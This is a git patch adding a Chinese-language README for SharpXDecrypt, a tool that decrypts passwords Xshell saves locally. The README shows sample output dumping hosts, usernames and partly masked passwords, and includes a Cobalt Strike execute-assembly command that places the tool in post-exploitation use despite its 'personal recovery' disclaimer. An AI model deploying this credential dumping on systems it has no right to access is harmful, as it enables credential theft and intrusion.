From e0547686df9d959ebf5daa9f34a6d300a9577850 Mon Sep 17 00:00:00 2001 From: 0pen1 <45282604+0pen1@users.noreply.github.com> Date: Wed, 23 Feb 2022 11:13:27 +0800 Subject: [PATCH] Add files via upload --- README.md | 83 +++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 83 insertions(+) create mode 100644 README.md diff --git a/README.md b/README.md new file mode 100644 index 0000000..219206f --- /dev/null +++ b/README.md @@ -0,0 +1,83 @@ +# SharpXDecrypt + +## 声明 + +本程序仅供个人恢复密码使用,勿作非法用途,请在下载后24小时内删除!如果代码中存在侵权行为,请联系我们删除。 + + + +## 简介 + +Xshell全版本凭证一键导出工具,针对Xshell全版本在本地保存的密码进行解密,包括最新的7系列版本! + + + +## 使用方法 + +#### cmd.exe + +``` +C:\Users\asus\Desktop\DEV\SharpXDecrypt\bin\Debug> .\SharpXDecrypt.exe + +Xshell全版本凭证一键导出工具!(支持最新Xshell 7系列版本!) +Author: 0pen1 +Github: https://github.com/JDArmy +[!] WARNING: For learning purposes only,please delete it within 24 hours after downloading! + +[*] Start GetUserPath.... + UserPath: E:\NetSarang Computer\xshell6 + UserPath: C:\Users\asus\Documents\NetSarang Computer\7 +[*] Get UserPath Success ! + +[*] Start GetUserSID.... + Username: asus + userSID: S-1-5-21-736521517-423******97-1340300005-1001 +[*] GetUserSID Success ! + + XSHPath: E:\NetSarang Computer\xshell6\Xshell\Sessions\192.168.1.110.xsh + Host: 192.168.1.110 + UserName: wwwuser + Password: www*******Aqx + Version: 6.0 + + XSHPath: C:\Users\asus\Documents\NetSarang Computer\7\Xshell\Sessions\192.168.1.110.xsh + Host: 192.168.1.110 + UserName: wwwuser + Password: ww********Aqx + Version: 7.1 + + XSHPath: C:\Users\asus\Documents\NetSarang Computer\7\Xshell\Sessions\Tokyo.xsh + Host: 198.13.51.134 + UserName: root + Password: W8*********PN__% + Version: 7.1 +``` + + + +#### Cobalt Strike + +``` +execute-assembly /path/to/SharpXDecrypt.exe +``` + + + +## 更新日志 + +- v0.1.0, 2022-02-22, 创建 + + + +## 致谢 + +暂无 + + + +## 参考 + +https://github.com/HyperSine/how-does-Xmanager-encrypt-password + +https://github.com/uknowsec/SharpDecryptPwd +